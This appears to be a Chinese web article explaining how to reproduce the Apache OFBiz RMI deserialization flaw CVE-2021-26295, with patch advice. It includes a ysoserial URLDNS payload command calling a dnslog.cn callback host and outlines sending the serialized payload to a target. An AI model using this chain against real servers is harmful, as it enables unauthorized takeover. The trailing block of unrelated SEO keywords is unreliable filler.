千家信息网

如何实现Apache OFBiz RMI反序列化漏洞CVE-2021-26295的复现

发表于:2025-02-23 作者:千家信息网编辑
千家信息网最后更新 2025年02月23日,本篇文章为大家展示了如何实现Apache OFBiz RMI反序列化漏洞CVE-2021-26295的复现,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。01
千家信息网最后更新 2025年02月23日如何实现Apache OFBiz RMI反序列化漏洞CVE-2021-26295的复现

本篇文章为大家展示了如何实现Apache OFBiz RMI反序列化漏洞CVE-2021-26295的复现,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。

01 漏洞概述

Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。

近日,Apache OFBiz官方发布安全更新。Apache OFBiz 存在RMI反序列化前台命令执行,未经身份验证的攻击者可以使用此漏洞来成功接管Apache OFBiz,建议相关用户尽快测试漏洞修复的版本并及时升级。

02 影响范围

【漏洞等级】 严重

【漏洞编号】

CVE-2021-26295

【影响版本】

Apache OFBiz < 17.12.06

03 漏洞复现

(1)docker搭建漏洞环境

(2)DNSLOG平台Get SubDomain,用ysoserial的URLDNS利用链生成文件

java -jar ysoserial.jar URLDNS http://isnrvo.dnslog.cn > dns.ot

(3)使用python脚本将生成的文件解码转换成hex

(4)利用转换后的hex代码,构造数据包发送请求

(5)DNSLOG平台检验执行结果

可以看到,DNSLOG平台收到响应,服务器执行代码成功!

04 修复方案

建议广大用户及时检查相关软件版本(可打开[OFBIZ_HOME/README] 文件, 查找Welcome to Apache OFBiz xxxx字样信息确定版本),将Apacge OFBiz升级到最新版本。

【补丁信息】

补丁名称:Apache OFBiz 远程代码执行漏洞补丁

补丁链接:https://ofbiz.apache.org/download.html#vulnerabilities

上述内容就是如何实现Apache OFBiz RMI反序列化漏洞CVE-2021-26295的复现,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注行业资讯频道。

漏洞 版本 平台 补丁 序列 代码 文件 成功 信息 内容 商务 建议 技能 数据 服务器 用户 电子 电子商务 知识 升级 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 以数据库应用的是什么 工行数据库操作异常什么意思 江苏智能软件开发互惠互利 网络技术项目计划书 学校学生网络安全工作总结 端游方舟生存进化服务器 网络安全中df是什么符号 中国数据库产品发展 计算机网络技术的考查科目 手抄报关于网络安全手写文字内容 计算机网络技术那一年开设的 网络安全的法律法规试题 梦幻转服没有想去的服务器怎么办 非关系型数据库包括键值数据库 江苏网络安全管理模式 网络技术新进展 吉林软件开发电话 昊宇网络技术有限公司 金华网络技术中心 河北企业软件开发服务放心可靠 2022年网络安全进校园动漫 浪潮服务器管理口连接笔记本 北京特种网络技术分类技术 网络技术新进展 数据库服务器维保 江苏猫人互联网科技有限公司 2019年网络安全大会 武汉网络时钟同步服务器 互联网科技公司行业代码 内网访问外网服务器
0